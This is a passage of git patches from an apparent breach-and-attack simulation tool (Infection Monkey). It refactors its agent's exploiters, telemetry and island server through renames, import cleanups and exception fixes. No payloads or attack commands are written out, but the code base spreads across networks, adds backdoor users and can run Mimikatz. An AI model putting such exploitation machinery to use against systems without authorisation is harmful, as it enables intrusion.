import is_windows_os # Timeout for monkey connections TIMEOUT = 15 +LOOPBACK_NAME = b"lo" +SIOCGIFADDR = 0x8915 # get PA address +SIOCGIFNETMASK = 0x891b # get network PA mask +RTF_UP = 0x0001 # Route usable +RTF_REJECT = 0x0200 def get_host_subnets(): @@ -62,12 +67,6 @@ else: def get_routes(): # based on scapy implementation for route parsing - LOOPBACK_NAME = b"lo" - SIOCGIFADDR = 0x8915 # get PA address - SIOCGIFNETMASK = 0x891b # get network PA mask - RTF_UP = 0x0001 # Route usable - RTF_REJECT = 0x0200 - try: f = open("/proc/net/route", "r") except IOError: diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index eb1e5d355..7650cb229 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -64,7 +64,6 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): if self.path != '/' + urllib.parse.quote(os.path.basename(self.filename)): self.send_error(500, "") return None, 0, 0 - f = None try: f = monkeyfs.open(self.filename, 'rb') except IOError: @@ -100,10 +99,10 @@ class FileServHTTPRequestHandler(http.server.BaseHTTPRequestHandler): self.end_headers() return f, start_range, end_range - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("FileServHTTPRequestHandler: %s - - [%s] %s" % (self.address_string(), self.log_date_time_string(), - format % args)) + format_string % args)) class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): @@ -117,7 +116,6 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): def do_CONNECT(self): # just provide a tunnel, transfer the data with no modification req = self - reqbody = None req.path = "https://%s/" % req.path.replace(':443', '') u = urlsplit(req.path) @@ -148,9 +146,9 @@ class HTTPConnectProxyHandler(http.server.BaseHTTPRequestHandler): update_last_serve_time() conn.close() - def log_message(self, format, *args): + def log_message(self, format_string, *args): LOG.debug("HTTPConnectProxyHandler: %s - [%s] %s" % - (self.address_string(), self.log_date_time_string(), format % args)) + (self.address_string(), self.log_date_time_string(), format_string % args)) class HTTPServer(threading.Thread): diff --git a/monkey/monkey_island/cc/environment/environment.py b/monkey/monkey_island/cc/environment/environment.py index 6115e8dd9..868e6ec36 100644 --- a/monkey/monkey_island/cc/environment/environment.py +++ b/monkey/monkey_island/cc/environment/environment.py @@ -34,8 +34,8 @@ def load_server_configuration_from_file(): def load_env_from_file(): - config_json = load_server_configuration_from_file() - return config_json['server_config'] + loaded_config_json = load_server_configuration_from_file() + return loaded_config_json['server_config'] try: diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index 1a0e872f6..c257ae298 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -132,7 +132,7 @@ def is_monkey(object_id): try: _ = Monkey.get_single_monkey_by_id(object_id) return True - except: + except MonkeyNotFoundError: return False diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 09771302d..641da8055 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -144,7 +144,7 @@ class ConfigService: if should_encrypt: try: ConfigService.encrypt_config(config_json) - except KeyError as e: + except KeyError: logger.error('Bad configuration file was submitted.') return False mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) @@ -154,9 +154,9 @@ class ConfigService: @staticmethod def init_default_config(): if ConfigService.default_config is None: - defaultValidatingDraft4Validator = ConfigService._extend_config_with_default(Draft4Validator) + default_validating_draft4_validator = ConfigService._extend_config_with_default(Draft4Validator) config = {} - defaultValidatingDraft4Validator(SCHEMA).validate(config) + default_validating_draft4_validator(SCHEMA).validate(config) ConfigService.default_config = config @staticmethod @@ -207,15 +207,15 @@ class ConfigService: # Do it only for root. if instance != {}: return - for property, subschema in list(properties.items()): + for property1, subschema1 in list(properties.items()): main_dict = {} - for property2, subschema2 in list(subschema["properties"].items()): + for property2, subschema2 in list(subschema1["properties"].items()): sub_dict = {} for property3, subschema3 in list(subschema2["properties"].items()): if "default" in subschema3: sub_dict[property3] = subschema3["default"] main_dict[property2] = sub_dict - instance.setdefault(property, main_dict) + instance.setdefault(property1, main_dict) for error in validate_properties(validator, properties, instance, schema): yield error diff --git a/monkey/monkey_island/cc/services/edge.py b/monkey/monkey_island/cc/services/edge.py index bf9417309..b026fa480 100644 --- a/monkey/monkey_island/cc/services/edge.py +++ b/monkey/monkey_island/cc/services/edge.py @@ -141,7 +141,7 @@ class EdgeService: @staticmethod def get_edge_label(edge): - NodeService = monkey_island.cc.services.node.NodeService + node_service = monkey_island.cc.services.node.NodeService from_id = edge["from"] to_id = edge["to"] @@ -153,9 +153,9 @@ class EdgeService: if is_monkey(to_id): to_label = get_monkey_label_by_id(to_id) else: - to_label = NodeService.get_node_label(NodeService.get_node_by_id(to_id)) + to_label = node_service.get_node_label(node_service.get_node_by_id(to_id)) - RIGHT_ARROW = "\u2192" return "%s %s %s" % (from_label, RIGHT_ARROW, to_label) +RIGHT_ARROW = "\u2192" diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py index 0c0a873e8..da45509d7 100644 --- a/monkey/monkey_island/cc/services/node.py +++ b/monkey/monkey_island/cc/services/node.py @@ -56,9 +56,9 @@ class NodeService: accessible_from_nodes.append(from_node_label) accessible_from_nodes_hostnames.append(from_node_hostname) - for exploit in edge["exploits"]: - exploit["origin"] = from_node_label - exploits.append(exploit) + for edge_exploit in edge["exploits"]: + edge_exploit["origin"] = from_node_label + exploits.append(edge_exploit) exploits = sorted(exploits, key=lambda exploit: exploit['timestamp']) From fd70ecfe29980d0b44c2d4c38f56df17a3ec3de9 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:52 +0200 Subject: [PATCH 26/44] Intentional shadowing of builtins --- monkey/infection_monkey/monkeyfs.py | 1 + monkey/infection_monkey/system_info/__init__.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index b65443c76..e64682501 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -52,6 +52,7 @@ def virtual_path(name): return "%s%s" % (MONKEYFS_PREFIX, name) +# noinspection PyShadowingBuiltins def open(name, mode='r', buffering=-1): # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths if name.startswith(MONKEYFS_PREFIX): diff --git a/monkey/infection_monkey/system_info/__init__.py b/monkey/infection_monkey/system_info/__init__.py index ab8e0f7ba..7d4395af7 100644 --- a/monkey/infection_monkey/system_info/__init__.py +++ b/monkey/infection_monkey/system_info/__init__.py @@ -16,6 +16,7 @@ LOG = logging.getLogger(__name__) try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = psutil.AccessDenied __author__ = 'uri' From f8b38d9a8d6d5a4ce9f774c462a8c3f9e07074cb Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:05 +0200 Subject: [PATCH 27/44] Change is to isisntance for type checking --- monkey/infection_monkey/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 6b01761d1..f3936fe19 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -74,7 +74,7 @@ class Configuration(object): val_type = type(value) - if val_type is types.FunctionType or val_type is types.MethodType: + if isinstance(val_type, types.FunctionType) or isinstance(val_type, types.MethodType): continue if val_type in (type, ABCMeta): From 719088070e752774e3b1d17a57c33f3ed81f4353 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:16:19 +0200 Subject: [PATCH 28/44] Added todo --- monkey/infection_monkey/system_info/windows_info_collector.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/system_info/windows_info_collector.py b/monkey/infection_monkey/system_info/windows_info_collector.py index 08ca6ff29..2c3696f44 100644 --- a/monkey/infection_monkey/system_info/windows_info_collector.py +++ b/monkey/infection_monkey/system_info/windows_info_collector.py @@ -35,7 +35,7 @@ class WindowsInfoCollector(InfoCollector): """ LOG.debug("Running Windows collector") super(WindowsInfoCollector, self).get_info() - #self.get_wmi_info() + # TODO: Think about returning self.get_wmi_info() self.get_installed_packages() from infection_monkey.config import WormConfiguration if WormConfiguration.should_use_mimikatz: From 6992902991de7189472a981bd5111c694da1e39f Mon Sep 17 00:00:00 2001 From: Shivank Date: Mon, 28 Oct 2019 22:53:07 +0530 Subject: [PATCH 29/44] JS File-saver dependency patch --- monkey/monkey_island/cc/ui/package.json | 1 - .../cc/ui/src/components/pages/ConfigurePage.js | 7 +++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index 4da085836..bc63bfccb 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -75,7 +75,6 @@ "fetch": "^1.1.0", "file-saver": "^2.0.2", "filepond": "^4.2.0", - "js-file-download": "^0.4.4", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", "moment": "^2.22.2", diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..a5aeae3ec 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import fileDownload from 'js-file-download'; +import FileSaver from "file-saver"; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,7 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - fileDownload(JSON.stringify(this.state.configuration, null, 2), 'monkey.conf'); + const JSONString = JSON.stringify(this.state.configuration, null, 2); + const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + + FileSaver.saveAs(blob, 'monkey.conf'); }; sendConfig() { From 797b6c58b9035431c4d6c42d5448e51f3933ba90 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:41:35 +0200 Subject: [PATCH 30/44] Removed some unused imports --- monkey/common/cloud/aws_service_test.py | 1 - monkey/infection_monkey/post_breach/actions/add_user.py | 1 - monkey/monkey_island/cc/environment/aws.py | 1 - monkey/monkey_island/cc/resources/version_update.py | 1 - monkey/monkey_island/cc/services/remote_run_aws.py | 1 - monkey/monkey_island/cc/services/reporting/report.py | 1 - .../cc/services/telemetry/zero_trust_tests/machine_exploited.py | 1 - 7 files changed, 7 deletions(-) diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index 25d1b8b6e..ae9c4b5d3 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py @@ -3,7 +3,6 @@ from .aws_service import filter_instance_data_from_aws_response import json - __author__ = 'shay.nehmad' diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py index 09c8d4796..074e31460 100644 --- a/monkey/infection_monkey/post_breach/actions/add_user.py +++ b/monkey/infection_monkey/post_breach/actions/add_user.py @@ -13,4 +13,3 @@ class BackdoorUser(PBA): POST_BREACH_BACKDOOR_USER, linux_cmd=' '.join(linux_cmds), windows_cmd=windows_cmds) - diff --git a/monkey/monkey_island/cc/environment/aws.py b/monkey/monkey_island/cc/environment/aws.py index 797a395aa..18db5c376 100644 --- a/monkey/monkey_island/cc/environment/aws.py +++ b/monkey/monkey_island/cc/environment/aws.py @@ -1,7 +1,6 @@ import monkey_island.cc.auth from monkey_island.cc.environment import Environment from common.cloud.aws_instance import AwsInstance -from Crypto.Hash import SHA3_512 __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py index 5b34f4206..b1fbfdf82 100644 --- a/monkey/monkey_island/cc/resources/version_update.py +++ b/monkey/monkey_island/cc/resources/version_update.py @@ -2,7 +2,6 @@ import flask_restful import logging from monkey_island.cc.environment.environment import env -from monkey_island.cc.auth import jwt_required from monkey_island.cc.services.version_update import VersionUpdateService __author__ = 'itay.mizeretz' diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 4ec1fd427..c81e0bc4a 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -1,6 +1,5 @@ import logging -from monkey_island.cc.services.config import ConfigService from common.cloud.aws_instance import AwsInstance from common.cloud.aws_service import AwsService from common.cmd.aws.aws_cmd_runner import AwsCmdRunner diff --git a/monkey/monkey_island/cc/services/reporting/report.py b/monkey/monkey_island/cc/services/reporting/report.py index 01be940c4..6a44679a4 100644 --- a/monkey/monkey_island/cc/services/reporting/report.py +++ b/monkey/monkey_island/cc/services/reporting/report.py @@ -12,7 +12,6 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups -from monkey_island.cc.services.edge import EdgeService from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.pth_report import PTHReportService from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 454f3a7fe..59ba296cd 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,5 +1,4 @@ from common.data.zero_trust_consts import * -from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From f430bfb940e07ee41a9badc1d13e9bc2362d4980 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:43:01 +0200 Subject: [PATCH 31/44] Changed info to debug in tests --- monkey/monkey_island/cc/models/test_monkey.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 5d81e0b1d..3c10ca7d7 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -142,7 +142,7 @@ class TestMonkey(IslandTestCase): cache_info_after_query_1 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_1.hits, 0) self.assertEqual(cache_info_after_query_1.misses, 1) - logger.info("1) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("1) ID: {} label: {}".format(linux_monkey.id, label)) self.assertIsNotNone(label) self.assertIn(hostname_example, label) @@ -150,7 +150,7 @@ class TestMonkey(IslandTestCase): # should be cached label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("2) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("2) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_2 = Monkey.get_label_by_id.storage.backend.cache_info() self.assertEqual(cache_info_after_query_2.hits, 1) self.assertEqual(cache_info_after_query_2.misses, 1) @@ -160,7 +160,7 @@ class TestMonkey(IslandTestCase): # should be a miss label = Monkey.get_label_by_id(linux_monkey.id) - logger.info("3) ID: {} label: {}".format(linux_monkey.id, label)) + logger.debug("3) ID: {} label: {}".format(linux_monkey.id, label)) cache_info_after_query_3 = Monkey.get_label_by_id.storage.backend.cache_info() logger.debug("Cache info: {}".format(str(cache_info_after_query_3))) # still 1 hit only From 75bff2264925a9251bd403c10bbb0a82d24a97ee Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 20:59:30 +0200 Subject: [PATCH 32/44] Changed import * to explicit imports --- monkey/common/network/segmentation_utils_test.py | 2 +- .../infection_monkey/exploit/tools/payload_parsing_test.py | 1 - monkey/infection_monkey/exploit/web_rce.py | 3 ++- monkey/infection_monkey/utils/users.py | 2 -- .../cc/models/zero_trust/test_aggregate_finding.py | 2 +- monkey/monkey_island/cc/models/zero_trust/test_finding.py | 2 +- .../cc/services/reporting/test_zero_trust_service.py | 7 ++++++- .../cc/services/reporting/zero_trust_service.py | 5 ++++- .../cc/services/telemetry/processing/__init__.py | 7 ------- .../cc/services/telemetry/processing/post_breach.py | 2 +- .../cc/services/telemetry/processing/processing.py | 3 ++- .../services/telemetry/zero_trust_tests/data_endpoints.py | 3 ++- .../telemetry/zero_trust_tests/machine_exploited.py | 2 +- 13 files changed, 21 insertions(+), 20 deletions(-) diff --git a/monkey/common/network/segmentation_utils_test.py b/monkey/common/network/segmentation_utils_test.py index 221f1d9bf..9dea1af19 100644 --- a/monkey/common/network/segmentation_utils_test.py +++ b/monkey/common/network/segmentation_utils_test.py @@ -1,4 +1,4 @@ -from common.network.network_range import * +from common.network.network_range import CidrRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py index 23358a290..315216d5f 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py @@ -29,4 +29,3 @@ class TestPayload(TestCase): array2[1] == "prefix5678suffix" and len(array2) == 2) assert test1 and test2 - diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 1b5b9d75b..672861355 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -4,9 +4,10 @@ from posixpath import join from abc import abstractmethod from infection_monkey.exploit import HostExploiter -from infection_monkey.model import * from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.http_tools import HTTPTools +from infection_monkey.model import CHECK_COMMAND, ID_STRING, GET_ARCH_LINUX, GET_ARCH_WINDOWS, BITSADMIN_CMDLINE_HTTP, \ + POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT, CHMOD_MONKEY, RUN_MONKEY, MONKEY_ARG, DROPPER_ARG from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING diff --git a/monkey/infection_monkey/utils/users.py b/monkey/infection_monkey/utils/users.py index 68148d9e9..b2f29db85 100644 --- a/monkey/infection_monkey/utils/users.py +++ b/monkey/infection_monkey/utils/users.py @@ -6,5 +6,3 @@ def get_commands_to_add_user(username, password): linux_cmds = get_linux_commands_to_add_user(username) windows_cmds = get_windows_commands_to_add_user(username, password) return linux_cmds, windows_cmds - - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 161f064b2..59bf1aa66 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index 3b9dcbf33..d61478641 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index d77e67aad..a43da8416 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py @@ -1,4 +1,9 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ + TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ + PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ + TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ + TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ + PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 04f661b28..24bd81e0d 100644 --- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,5 +1,8 @@ import json -from common.data.zero_trust_consts import * + +from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ + PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ + TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py index 966877967..e69de29bb 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py @@ -1,7 +0,0 @@ -# import all implemented hooks, for brevity of hooks.py file -from .tunnel import process_tunnel_telemetry -from .state import process_state_telemetry -from .exploit import process_exploit_telemetry -from .scan import process_scan_telemetry -from .system_info import process_system_info_telemetry -from .post_breach import process_post_breach_telemetry diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index c64849905..b0e2eb8b7 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py @@ -1,5 +1,5 @@ +from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER from monkey_island.cc.database import mongo -from common.data.post_breach_consts import * from monkey_island.cc.models import Monkey from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py index 36f75fdbd..f6ddcd970 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py @@ -1,6 +1,7 @@ import logging -from monkey_island.cc.services.telemetry.processing import * +from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, process_state_telemetry, \ + process_exploit_telemetry, process_scan_telemetry, process_system_info_telemetry, process_post_breach_telemetry logger = logging.getLogger(__name__) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index b4e0bb4ec..e6afcf088 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py @@ -1,7 +1,8 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ + TEST_DATA_ENDPOINT_ELASTIC from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 59ba296cd..fe0015576 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From d69976f4b5a5c0c2af2d2996c60eab5371fb54ac Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:03:51 +0200 Subject: [PATCH 33/44] Fixed unresolved reference self.host instead of host --- monkey/infection_monkey/exploit/web_rce.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 672861355..b894acf43 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -257,7 +257,7 @@ class WebRCE(HostExploiter): if 'No such file' in resp: return False else: - LOG.info("Host %s was already infected under the current configuration, done" % str(host)) + LOG.info("Host %s was already infected under the current configuration, done" % str(self.host)) return True def check_remote_files(self, url): @@ -285,7 +285,7 @@ class WebRCE(HostExploiter): """ ports = self.get_open_service_ports(ports, names) if not ports: - LOG.info("All default web ports are closed on %r, skipping", str(host)) + LOG.info("All default web ports are closed on %r, skipping", str(self.host)) return False else: return ports @@ -462,7 +462,7 @@ class WebRCE(HostExploiter): """ src_path = get_target_monkey(self.host) if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", host) + LOG.info("Can't find suitable monkey executable for host %r", self.host) return False # Determine which destination path to use dest_path = self.get_monkey_upload_path(src_path) From 40494d3c3c2e3e2649685773cb316845c9242301 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:11:05 +0200 Subject: [PATCH 34/44] Auto reformat all code --- monkey/infection_monkey/dropper.py | 2 +- monkey/infection_monkey/example.conf | 206 +++++++------- .../infection_monkey/exploit/elasticgroovy.py | 4 +- monkey/infection_monkey/exploit/mssqlexec.py | 7 +- monkey/infection_monkey/exploit/shellshock.py | 2 +- .../exploit/tools/exceptions.py | 2 - .../infection_monkey/exploit/tools/helpers.py | 2 +- .../exploit/tools/payload_parsing.py | 2 +- .../exploit/tools/smb_tools.py | 1 + monkey/infection_monkey/exploit/weblogic.py | 3 - .../infection_monkey/exploit/win_ms08_067.py | 10 +- monkey/infection_monkey/exploit/wmiexec.py | 1 - monkey/infection_monkey/model/__init__.py | 24 +- monkey/infection_monkey/monkey.py | 2 +- monkey/infection_monkey/network/info.py | 1 - .../network/mssql_fingerprint.py | 1 - .../infection_monkey/network/tcp_scanner.py | 1 - .../post_breach/actions/users_custom_pba.py | 1 + monkey/infection_monkey/post_breach/pba.py | 2 +- .../post_breach/post_breach_handler.py | 1 + monkey/infection_monkey/pyinstaller_utils.py | 1 - .../system_info/linux_info_collector.py | 1 - .../system_info/windows_info_collector.py | 1 + .../system_info/wmi_consts.py | 1 - monkey/infection_monkey/system_singleton.py | 1 - monkey/infection_monkey/transport/__init__.py | 1 - monkey/infection_monkey/transport/tcp.py | 4 +- monkey/monkey_island/cc/app.py | 1 - monkey/monkey_island/cc/island_logger.py | 1 - .../cc/island_logger_default_config.json | 60 ++--- monkey/monkey_island/cc/main.py | 1 + monkey/monkey_island/cc/models/monkey.py | 1 + monkey/monkey_island/cc/models/test_monkey.py | 1 - .../cc/models/zero_trust/test_finding.py | 1 + .../cc/resources/attack/attack_config.py | 1 - .../monkey_island/cc/resources/local_run.py | 1 + monkey/monkey_island/cc/resources/monkey.py | 1 + monkey/monkey_island/cc/resources/netmap.py | 2 - .../cc/resources/pba_file_download.py | 1 + 